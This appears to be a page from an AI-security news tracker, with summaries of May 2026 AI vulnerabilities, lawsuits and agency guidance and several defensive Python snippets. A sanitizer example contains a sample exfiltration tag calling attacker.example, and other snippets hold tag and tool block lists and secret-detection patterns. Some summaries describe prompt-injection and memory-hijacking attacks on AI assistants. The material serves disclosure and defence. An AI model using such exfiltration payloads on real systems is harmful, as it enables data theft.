Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710 · Last 24 hours: 1 · Last 7 days: 67
Daily Briefing: Friday, May 8, 2026

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely-trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.
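
The hardcoded-credential half of that risk is straightforward to audit. A minimal sketch, assuming the common mcpServers JSON layout used by several MCP hosts; the file name, key names, and token-prefix patterns below are illustrative heuristics, not any standard:

    import json
    import re
    from pathlib import Path

    # Heuristic patterns only: key names that usually hold secrets, plus a few
    # well-known token prefixes. Both lists are assumptions to tune per environment.
    SUSPICIOUS_KEY = re.compile(r"key|token|secret|password|credential", re.IGNORECASE)
    LIKELY_SECRET = re.compile(r"^(sk-|ghp_|xox[bp]-|AKIA)")

    def scan_mcp_config(path: str) -> list[str]:
        """Flag entries in an MCP client config that look like embedded credentials."""
        findings = []
        config = json.loads(Path(path).read_text())
        for name, server in config.get("mcpServers", {}).items():
            for key, value in server.get("env", {}).items():
                if isinstance(value, str) and (SUSPICIOUS_KEY.search(key) or LIKELY_SECRET.match(value)):
                    findings.append(f"{name}: env var {key!r} looks like a hardcoded credential")
            for arg in server.get("args", []):
                # Secrets passed as command-line arguments also leak via process listings.
                if isinstance(arg, str) and LIKELY_SECRET.match(arg):
                    findings.append(f"{name}: command-line argument looks like an embedded credential")
        return findings

    if __name__ == "__main__":
        # File name is illustrative; point this at whichever MCP host config you use.
        for finding in scan_mcp_config("claude_desktop_config.json"):
            print(finding)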

Latest Intel

Page 14 of 371
01

CVE-2026-42075: Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in

security
May 4, 2026

Evolver, a GEP-powered self-evolving engine for AI agents, contained a path traversal vulnerability (a type of attack where an attacker manipulates file paths to access files outside their intended directory) in versions before 1.69.3. The vulnerability was in the skill download command's --out= flag, which did not validate user-provided file paths, allowing attackers to write files to any location on the system, potentially overwriting critical files.
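
As an illustration of the missing control (a hypothetical sketch in Python, not Evolver's actual code), the usual fix is to resolve the user-supplied output path and refuse anything that escapes an allowed base directory:

    from pathlib import Path

    def safe_output_path(user_path: str, base_dir: str = "skills") -> Path:
        """Resolve a user-supplied output path and reject escapes from base_dir.

        Names are illustrative. Resolution collapses ".." segments and follows
        symlinks, so traversal attempts become visible before any write happens.
        """
        base = Path(base_dir).resolve()
        target = (base / user_path).resolve()
        if not target.is_relative_to(base):  # Python 3.9+
            raise ValueError(f"refusing to write outside {base}: {target}")
        return target

    # "web/search.yaml" resolves to a file under the base directory, while
    # "../../etc/crontab" (or any absolute path) raises before a file is written.
    print(safe_output_path("web/search.yaml"))
    # safe_output_path("../../etc/crontab")  -> ValueError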

Fix: This issue has been patched in version 1.69.3. Users should upgrade to version 1.69.3 or later.

NVD/CVE Database
02

Anthropic teams with Goldman, Blackstone and others on $1.5 billion AI venture targeting PE-owned firms

industry
May 4, 2026

Anthropic has partnered with Goldman Sachs, Blackstone, and other investment firms to create a $1.5 billion venture that will deploy Claude, Anthropic's AI model, directly into businesses. The partnership aims to address a shortage of experts who can implement AI technology in real-world business operations by embedding engineers inside companies to redesign workflows and integrate AI into core processes, starting with companies owned by the investment firms.

CNBC Technology
03

AI platforms reference Nigel Farage more than other leaders when prompted on UK politics, study shows

research
May 4, 2026

A study found that AI platforms disproportionately reference Nigel Farage and Reform UK more than other UK political leaders when answering questions about British politics. Researchers suggest this indicates Reform UK has achieved unusual visibility in LLMs (large language models, AI systems trained on text data to generate responses).

The Guardian Technology
04

Week one of the Musk v. Altman trial: What it was like in the room

policy
May 4, 2026

Elon Musk is suing OpenAI and CEO Sam Altman in federal court, claiming he invested millions expecting OpenAI to remain a nonprofit organization and alleging that the company was secretly converted into a for-profit corporation, deceiving him about its original mission. The trial centers on whether Musk was actually deceived and when he discovered the alleged misconduct, with Musk seeking damages and the reversal of OpenAI's restructuring that reduced the nonprofit's control.

MIT Technology Review
05

Musk texted OpenAI's Brockman about settlement two days before trial began

policy
May 4, 2026

Elon Musk, who co-founded OpenAI in 2015, is suing the company for allegedly breaking its commitment to remain a nonprofit and pursue a charitable mission, claiming it instead commercialized the AI technology. Two days before the trial started, Musk texted OpenAI's president Greg Brockman about settling the case, but when Brockman suggested both sides drop their claims, Musk responded with a threat about making him and CEO Sam Altman "the most hated men in America."

CNBC Technology
06

CVE-2026-7482: Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint

security
May 4, 2026

Ollama versions before 0.17.1 have a heap out-of-bounds read vulnerability (a bug where code reads memory outside its intended boundaries) in the GGUF model loader (the component that loads GGUF files, a machine learning model format). An attacker can upload a malicious GGUF file through the /api/create endpoint (an unprotected interface) with fake tensor size information, causing the server to read beyond the file's actual data and leak sensitive information like API keys and user conversations, which can then be stolen through the /api/push endpoint.
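
The underlying mistake is generic: trusting size fields read from an untrusted file. A simplified sketch of the missing bounds check, written in Python for illustration (Ollama's loader is not Python, and the field names below are stand-ins for real GGUF metadata, which also carries dtypes, dimensions, and alignment):

    import os
    from dataclasses import dataclass

    @dataclass
    class TensorEntry:
        name: str
        offset: int   # declared byte offset of the tensor inside the data section
        nbytes: int   # declared length in bytes; attacker-controlled in a malicious file

    def read_tensor(f, data_start: int, entry: TensorEntry) -> bytes:
        """Read one tensor, refusing any entry whose declared extent falls outside the file."""
        file_size = os.fstat(f.fileno()).st_size
        if entry.offset < 0 or entry.nbytes < 0 or data_start + entry.offset + entry.nbytes > file_size:
            raise ValueError(f"tensor {entry.name!r} declares {entry.nbytes} bytes past end of file")
        f.seek(data_start + entry.offset)
        data = f.read(entry.nbytes)
        if len(data) != entry.nbytes:
            raise ValueError(f"short read for tensor {entry.name!r}")
        return data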

Fix: Update Ollama to version 0.17.1 or later.

NVD/CVE Database
07

Copirate 365 at DEF CON: Plundering in the Depths of Microsoft Copilot (CVE-2026-24299)

security
May 4, 2026

This writeup describes vulnerabilities found in Microsoft Copilot products that allow attackers to steal sensitive data through multiple attack chains, including data exfiltration via HTML preview features, hijacking the AI's long-term memory through prompt injection (tricking an AI by hiding instructions in its input), and creating persistent backdoors. The vulnerabilities, assigned CVE-2026-24299, exploited what researchers call the "lethal trifecta," where an AI has access to private data, untrusted content, and external communication channels simultaneously.
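
A generic mitigation for the HTML-preview exfiltration channel (a sketch only, not Microsoft's fix) is to strip tags that can trigger outbound requests before rendering model-generated HTML, since a single image tag pointing at an attacker's server is enough to leak data:

    from html.parser import HTMLParser

    # Tags that can make a preview issue a network request; list is illustrative.
    BLOCKED_TAGS = {"img", "script", "iframe", "link", "object", "embed", "form",
                    "audio", "video", "source"}

    class PreviewSanitizer(HTMLParser):
        def __init__(self):
            super().__init__()
            self.out = []

        def handle_starttag(self, tag, attrs):
            if tag in BLOCKED_TAGS:
                return  # drop anything that can trigger an outbound request
            # Also drop inline event handlers (onload, onclick, ...).
            kept = " ".join(f'{k}="{v}"' for k, v in attrs
                            if v is not None and not k.startswith("on"))
            self.out.append(f"<{tag} {kept}>" if kept else f"<{tag}>")

        def handle_endtag(self, tag):
            if tag not in BLOCKED_TAGS:
                self.out.append(f"</{tag}>")

        def handle_data(self, data):
            self.out.append(data)

    def sanitize_preview(html: str) -> str:
        parser = PreviewSanitizer()
        parser.feed(html)
        return "".join(parser.out)

    print(sanitize_preview('<p>report</p><img src="https://attacker.example/?q=SECRET">'))
    # -> <p>report</p>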

Fix: Microsoft patched these issues. The source states: "MSRC assigned CVE-2026-24299 and the issues are now patched." No specific patch version number or detailed mitigation steps are provided in the source text.

Embrace The Red
08

Security agencies draw red lines around agentic AI deployments

security, policy
May 4, 2026

Security agencies including CISA have issued joint guidance on safely deploying agentic AI (autonomous AI systems that can take actions independently), warning that prompt injection (tricking an AI by hiding instructions in its input) and other attacks are common threats. The advisory recommends organizations implement strict access controls using the principle of least privilege (giving systems only the minimum permissions they need), continuous monitoring with human oversight, and careful testing before deploying AI agents to production environments.

Fix: The source text outlines recommended design and development guidelines including: strong authentication using Secure by Design principles, enforcing least-privilege principles and isolating agent capabilities, maintaining a clear inventory of agent capabilities and dependencies, implementing continuous monitoring and auditing of AI agent operations, integrating human control and oversight into workflows (including live monitoring during task execution and human approval for decision-making steps), validating how agents interpret inputs to guard against prompt injection, and regular testing of incident response plans.
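
One of those recommendations, human approval for decision-making steps, can be wired directly into an agent's tool dispatcher. A minimal sketch, with hypothetical tool names and a console prompt standing in for a real approval workflow:

    from typing import Any, Callable

    # Which tools count as high-risk is an assumption; a real deployment would log
    # each decision and route approval through chat or ticketing rather than input().
    HIGH_RISK_TOOLS = {"send_email", "delete_file", "execute_shell", "transfer_funds"}

    def run_tool(name: str, func: Callable[..., Any], **kwargs: Any) -> Any:
        """Execute an agent tool call, pausing for human approval on high-risk actions."""
        if name in HIGH_RISK_TOOLS:
            print(f"[approval required] {name} with arguments {kwargs}")
            if input("approve? [y/N] ").strip().lower() != "y":
                raise PermissionError(f"human reviewer declined tool call: {name}")
        return func(**kwargs)

    # Example with a hypothetical tool implementation:
    def send_email(to: str, body: str) -> str:
        return f"sent to {to}"

    # run_tool("send_email", send_email, to="cfo@example.com", body="...")  # prompts first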

CSO Online
09

OpenAI Rolls Out Advanced Security for ChatGPT Accounts

security
May 4, 2026

OpenAI has introduced Advanced Account Security, an optional feature for ChatGPT users at high risk of targeted attacks, such as journalists and political dissidents. The feature strengthens account protection by disabling password-based login in favor of physical security keys or passkeys, replacing email and SMS account recovery with backup passkeys and recovery keys, shortening sign-in sessions, and automatically excluding user conversations from AI model training.

Fix: OpenAI offers Advanced Account Security as a mitigation. Users can enable this opt-in feature, which includes: disabling password-based login and requiring physical security keys or passkeys (OpenAI has partnered with Yubico to offer YubiKey devices at a discount); replacing email and SMS account recovery with backup passkeys, recovery keys, and security keys; shortening sign-in sessions; and receiving alerts about logins with the ability to manage active sessions. Users can enroll through OpenAI's dedicated enrollment page for Advanced Account Security.

SecurityWeek
10

The fake IT worker problem CISOs can’t ignore

security, safety
May 4, 2026

Fake IT workers, increasingly enabled by AI tools and deepfakes, are being hired into organizations as an insider threat (a risk posed by trusted employees or contractors with system access). State actors like North Korea and individuals use stolen or synthetic identities, AI-assisted interview responses, and social engineering to bypass recruitment screening and gain access to sensitive systems and data.

CSO Online
Critical This Week (5 issues)

critical · CVE-2026-42271: LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before vers
NVD/CVE Database · May 8, 2026

critical · CVE-2026-42203: LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.80.5 to before vers
NVD/CVE Database · May 8, 2026

critical · Gemini CLI Vulnerability Could Have Led to Code Execution, Supply Chain Attack
SecurityWeek · May 7, 2026

critical · GHSA-9h64-2846-7x7f: Axonflow fixed bugs by implementing multi-tenant isolation and access-control hardening
GitHub Advisory Database · May 6, 2026

critical · GHSA-gmvf-9v4p-v8jc: fast-jwt: JWT auth bypass due to empty HMAC secret accepted by async key resolver
CVE-2026-44351 · GitHub Advisory Database · May 6, 2026